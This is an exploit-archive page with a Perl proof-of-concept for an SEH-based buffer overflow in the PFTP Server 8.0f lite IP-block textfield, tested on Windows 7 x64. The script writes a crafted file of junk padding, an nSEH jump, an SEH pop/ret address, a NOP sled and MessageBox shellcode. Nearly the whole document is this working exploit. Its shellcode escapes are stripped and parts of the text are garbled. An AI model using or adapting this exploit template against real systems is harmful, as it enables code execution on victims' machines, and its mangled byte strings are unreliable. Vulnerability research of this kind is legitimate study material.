Home / os / winmobile

PFTP Server 8.0f Buffer Overflow

Posted on 01 September 2015

#************************************************************************************************************* # # Exploit Title: PFTP Server 8.0f (lite) SEH bypass technique tested on Win7x64 # Date: 8-29-2015 # Software Link: http://www.heise.de/download/the-personal-ftp-server-78679a5e8458e9faa7c5564617bdd4c4-1440883445-267104.html # Exploit Author: Robbie Corley # Contact: c0d3rc0rl3y@gmail.com # Website: # CVE: # Category: Local Exploit # # Description: # There is a textfield within the program that asks for IPs to be blocked against the FTP server that is vulnerable to an SEH based buffer overflow. # # Side Notes: I haven't been able to implement a partial EIP overwrite for ASLR on this exploit, so I had to resort # to manually adding an exception to ASLR in the ret's it. You should then be greeted with a MessageBox. #************************************************************************************************************** my $junk = "A" x 272; #$nseh = "xccxccxccxcc"; # breakpoint for testing $nseh = "xebx10x90x90"; # jump to shellcode $seh = pack('V',0x03033303); # popad, call ebp from DeviceHarddiskVolume1WindowsFontsStaticCache.dat, which is outside the module range and has SEH off #MessageBox Shellc0de #https://www.exploit-db.com/exploits/28996/ my $shellcode = "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42". "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03". "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b". "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e". "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c". "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74". "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe". "x49x0bx31xc0x51x50xffxd7"; $nops = "x90" x 20; my $junk2 = "x90" x 1000; open(myfile,'>buffy.txt'); print myfile $junk.$nseh.$seh.$nops.$shellcode.$junk2; close (myfile);gistry

 

TOP